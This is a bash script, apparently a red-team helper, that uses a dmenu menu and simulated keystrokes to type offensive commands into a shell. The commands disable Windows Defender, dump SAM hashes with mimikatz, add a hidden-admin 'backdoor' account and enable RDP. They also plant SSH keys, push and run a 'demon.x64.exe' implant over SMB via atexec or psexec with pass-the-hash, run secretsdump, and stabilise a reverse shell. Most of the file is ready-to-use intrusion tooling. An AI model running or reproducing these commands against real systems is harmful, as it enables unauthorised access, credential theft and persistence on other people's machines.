dmenu_keyboard

#!/bin/bash
# auto_shell.sh
# Created on: Tue 11 Aug 2020 11:44:27 AM CEST
#
#  ____   __  ____  __
# (  _ \ /. |(  _ \/  )
#  )___/(_  _))___/ )(
# (__)    (_)(__)  (__)
#
# Description:
#  Script to setup tty shell information without typo

# functions for a nicer syntax
function command() {
	xte "str $1"
	sleep 0.5
	xte "key Return"
}

function key() {
	xte "str $1"
	sleep 0.5
}

function ctrl() {
	xte "keydown Control_L" "key $1" "keyup Control_L"
}

function_meta=("bye_bye_defender" "Stabilise_reverse_shell" "Stabilise_reverse_shell3" \
	"vim_hexdump_ascii" "vim_hexdump_binary" "meterpreter_proxychain" \
	"tmux_sinc_panes_on" "tmux_sinc_panes_off" "mimikatz_dump_sam" "activate_rdp" "backdoor_win" \
	"powershell_find_txt" "powershell_find_ps1" "sharphound_exe_collect" "at_exec_ma_boy" "psexec_outa_here" \
	"secdump_over_the_air" "file_splitter" "add_ssh_keyz")

# function that are needed
function stabilize_rev_shell() {
	command "python -c 'import pty; pty.spawn(\"/bin/bash\")'"
	ctrl Z
	command "stty raw -echo"
	command "fg"
	command "export TERM=xterm"
}

function activate_rdp() {
	command "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
	command "netsh advfirewall firewall set rule group=\"remote desktop\" new enable=yes"
}

function mimikatz_dump_sam() {
	command "privilege::debug"
	command "token::elevate"
	command "lsadump::sam"
}

function tmux_sinc_panes_on() {
	ctrl A
	key ":"
	command "setw synchronize-panes on"
}

function tmux_sinc_panes_off() {
	ctrl A
	key ":"
	command "setw synchronize-panes off"
}

function stabilize_rev_shell3() {
	command "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"
	ctrl Z
	command "stty raw -echo"
	command "fg"
	command "export TERM=xterm"
}

function vim_hexdump_to_ascii() {
	xte "key Escape"
	command ":%!xxd"
}

function vim_hexdump_to_binary() {
	xte "key Escape"
	command ":%!xxd -r"
}

function bye_bye_defender() {
	command "Set-MpPreference -DisableRealtimeMonitoring \$true"
}

function meterpreter_proxychain() {
	command "background"
	command "use auxiliary/server/socks4a"
	command "use post/mult/manage/autoroute"
}

function powershell_find_txt() {
	key "Get-ChildItem -Path . -Filter *.txt -Recurse"
}

function powershell_find_ps1() {
	key "Get-ChildItem -Path . -Filter *.ps1 -Recurse"
}

function sharphound_exe_collect() {
	key "./SharpHound.exe -c All -s --outputdirectory collect --zipfilename log.zip"
}

function backdoor_win() {
	command "net user backdoor password1234 /add"
	sleep 1
	command "net localgroup \"Administrator\" backdoor /add"
	sleep 1
	command "net localgroup \"Remote Desktop Users\" backdoor /add"
}

function at_exec_ma_boy() {
	form_data=$(zenity --forms --title="Enter Information" \
	--text="Enter the following information:" \
	--add-entry="IP Address" \
	--add-entry="Username" \
	--add-combo="Authentication Type" --combo-values="Password|Hash" \
	--separator="|")
	ip_address=$(echo "$form_data" | cut -d"|" -f1)
	username=$(echo "$form_data" | cut -d"|" -f2)
	auth_type=$(echo "$form_data" | cut -d"|" -f3)

	password=$(zenity --password --title="enter $auth_type")

	sleep 2
	if [ $auth_type = "Hash" ]; then
		command "echo -e \"use C\\$\nput $HOME/payload/demon.x64.exe\" | smbclient.py -debug -hashes $password '$username@$ip_address'"
		sleep 1
		command "atexec.py -debug -hashes $password '${username}@$ip_address' 'c:\\demon.x64.exe'"
	else
		command "echo -e \"use C\\$\nput $HOME/payload/demon.x64.exe\" | smbclient.py -debug -hashes '${username}:${password}@$ip_address'"
		sleep 1
		command "atexec.py -debug '${username}:${password}@$ip_address' 'c:\\demon.x64.exe'"
	fi
}

function psexec_outa_here() {
	form_data=$(zenity --forms --title="Enter Information" \
	--text="Enter the following information:" \
	--add-entry="IP Address" \
	--add-entry="Username" \
	--add-combo="Authentication Type" --combo-values="Password|Hash" \
	--separator="|")
	ip_address=$(echo "$form_data" | cut -d"|" -f1)
	username=$(echo "$form_data" | cut -d"|" -f2)
	auth_type=$(echo "$form_data" | cut -d"|" -f3)

	password=$(zenity --password --title="enter $auth_type")

	sleep 2
	if [ $auth_type = "Hash" ]; then
		command "psexec.py -c $HOME/payload/demon.x64.exe -hashes $password '${username}@$ip_address' './demon.x64.exe'"
	else
		command "psexec.py -c $HOME/payload/demon.x64.exe '${username}:${password}@$ip_address' './demon.x64.exe'"
	fi
}

function secdump_over_the_air() {
	form_data=$(zenity --forms --title="Enter Information" \
	--text="Enter the following information:" \
	--add-entry="IP Address" \
	--add-entry="Username" \
	--add-combo="Authentication Type" --combo-values="Password|Hash" \
	--separator="|")
	ip_address=$(echo "$form_data" | cut -d"|" -f1)
	username=$(echo "$form_data" | cut -d"|" -f2)
	auth_type=$(echo "$form_data" | cut -d"|" -f3)

	password=$(zenity --password --title="enter $auth_type")

	sleep 2
	if [ $auth_type = "Hash" ]; then
		command "secretsdump.py -hashes $password '${username}@$ip_address'"
	else
		command "secretsdump.py '${username}:${password}@$ip_address'"
	fi
}

function file_splitter() {
	form_output=$(zenity --forms \
		--title="File splitter:" \
		--text="Please enter a number and select an option:" \
		--add-entry="Enter a Number:" \
		--add-combo="Select Option:" \
		--combo-values="drag|path" \
		--separator="|")
	files=
	if [ -z "$form_output" ]; then
		zenity --info --title="Information" --text="No input provided. Exiting."
		exit 1
	fi
	number_of_splits=$(echo "$form_output" | cut -d"|" -f1)
	type_of_option=$(echo "$form_output" | cut -d"|" -f2)
	if ! [[ "$number_of_splits" =~ ^[0-9]+$ ]]; then
		zenity --error --title="Error" --text="Invalid input. Please enter a valid number."
		exit 1
	fi
	working_dir=$(mktemp -d )

	cd $working_dir
	if [ $type_of_option = "drag" ]; then
		zenity --info --title="Success" --text="You entered: $number_of_splits amount of splits please drag the file in the window that will open after this dialog"
		files=$(/etc/p3ng0s/ripdrag -p -k -t)
		echo $files | xargs -I {} cp -r "{}" .
	else
		files=$(zenity --title="Enter Path" --text="Please enter a path:" --file-selection --filename="/")
		echo $files | xargs -I {} cp -r "{}" .
	fi
	files=$(/usr/bin/ls $working_dir)
	echo $files | xargs -I {} split -n $number_of_splits -d --additional-suffix=.bin {} {}
	echo $files | xargs -I {} rm -rf "{}"
	ripdrag $(/usr/bin/ls $working_dir)
}

function add_ssh_keyz() {
	KEY_PATH=${HOME}/.ssh/id_rsa.pub

	command "echo \"$(cat ${KEY_PATH})\" > ~/.ssh/authorized_keys"
}

ret=$(echo ${function_meta[*]} | tr ' ' '\n' | dmenu "$@")


if [ ! -z $ret ]; then
	sleep 2
	if [ $ret = "Stabilise_reverse_shell" ]; then
		stabilize_rev_shell
	elif [ $ret = "bye_bye_defender" ]; then
		bye_bye_defender
	elif [ $ret = "Stabilise_reverse_shell3" ]; then
		stabilize_rev_shell3
	elif [ $ret = "vim_hexdump_ascii" ]; then
		vim_hexdump_to_ascii
	elif [ $ret = "vim_hexdump_binary" ]; then
		vim_hexdump_to_binary
	elif [ $ret = "meterpreter_proxychain" ]; then
		meterpreter_proxychain
	elif [ $ret = "tmux_sinc_panes_on" ]; then
		tmux_sinc_panes_on
	elif [ $ret = "tmux_sinc_panes_off" ]; then
		tmux_sinc_panes_off
	elif [ $ret = "mimikatz_dump_sam" ]; then
		mimikatz_dump_sam
	elif [ $ret = "activate_rdp" ]; then
		activate_rdp
	elif [ $ret = "backdoor_win" ]; then
		backdoor_win
	elif [ $ret = "powershell_find_txt" ]; then
		powershell_find_txt
	elif [ $ret = "powershell_find_ps1" ]; then
		powershell_find_ps1
	elif [ $ret = "sharphound_exe_collect" ]; then
		sharphound_exe_collect
	elif [ $ret = "at_exec_ma_boy" ]; then
		at_exec_ma_boy
	elif [ $ret = "psexec_outa_here" ]; then
		psexec_outa_here
	elif [ $ret = "secdump_over_the_air" ]; then
		secdump_over_the_air
	elif [ $ret = "file_splitter" ]; then
		file_splitter
	elif [ $ret = "add_ssh_keyz" ]; then
		add_ssh_keyz
	fi
fi